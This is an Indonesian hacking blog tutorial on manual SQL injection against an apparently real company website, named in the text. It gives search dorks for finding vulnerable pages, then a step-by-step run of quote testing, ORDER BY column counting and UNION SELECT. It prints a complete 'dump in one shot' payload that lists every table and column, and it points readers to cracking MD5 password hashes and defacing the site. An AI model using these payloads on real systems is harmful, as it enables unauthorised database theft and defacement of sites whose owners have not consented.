Home
DEFACE
SQLI

Sqli manual with Dios

sqli manual, injection,dork,md5,database
Hae gaes:v welcome to my blog


Kali ini gw bakal ngasih tau cara inject web bug sqli with dios(dump in one shot)

Pertama2 kita dorking dulu

Dork:
-page.php?id=
-Ext:php inurl:= site:.com 

kembangin lagi biar dapet prawan:D

http://www.kabelindo.co.id/readnews.php?id=4

Ini contoh web yg vuln sqli gw males ngedork jdi cari yg dah jebol aja hehehe:v

Nah abis itu kita kasih tanda petik ( ' ) dibelakang url nya

http://www.kabelindo.co.id/readnews.php?id=4'


Nah klo ada kata2 You have an error in your SQL syntax; 
Berarti web itu vuln:v kita lanjut cari nomer togel make 

 +order+by+1

 Misal

 http://www.kabelindo.co.id/readnews.php?id=4+order+by+1--+

http://www.kabelindo.co.id/readnews.php?id=4+order+by+2--+

 http://www.kabelindo.co.id/readnews.php?id=4+order+by+3--+

 http://www.kabelindo.co.id/readnews.php?id=4+order+by+4--+

 http://www.kabelindo.co.id/readnews.php?id=4+order+by+5--+

 http://www.kabelindo.co.id/readnews.php?id=4+order+by+6--+

 Nah sampe d 6 gaada coloum

Brarti colomnya cuman nyampe 5

Nah skrg dah tau jumlah kolom abis itu kita cari angka togel nya:v make

+union+select+1,2,3,4,5--+

(1,2,3,4,5) itu tegantung jumlah kolom yg ada tadi klo nyampe 10 ya tulis sampe 10


Nah nih penting bgt klo lu lagi cari togel jgn lupa kasih tanda (  - ) misal 

 http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,2,3,4,5--+

 Nah abis itu lu bakal nemu Angka togel :v
Nah abis itu kita dump kolom nya make dios

Contoh :.

http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,(tempelin dios lu),3,4,5--+

Nah skrg masukin dios di angka togel tadi 

 Nah gini

 http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5--+

Baca Juga  • hackbar Online Sqli manual



Nah abis itu klo lu berhasil maka akan keluar bnyk coloum
Klo udh keluar tinggal dump deh table yg lu mau :D
Dios???Disini

Klo udh dapet yg di dump biasanya passwordnya masih berbentuk md5 kita hash dulu  Disini

Ok sekian dari gw kalo ada salah kata ya biasa la kntl
kalo depes jn lupa backup index 


pemula dengan 1001 kesalahan

2 comments

  1. sangat bermanfaat, terima kasih
  2. don't miss these ~>>> for free
© Angkring Tutorial. All rights reserved. Premium By Angkring tutorial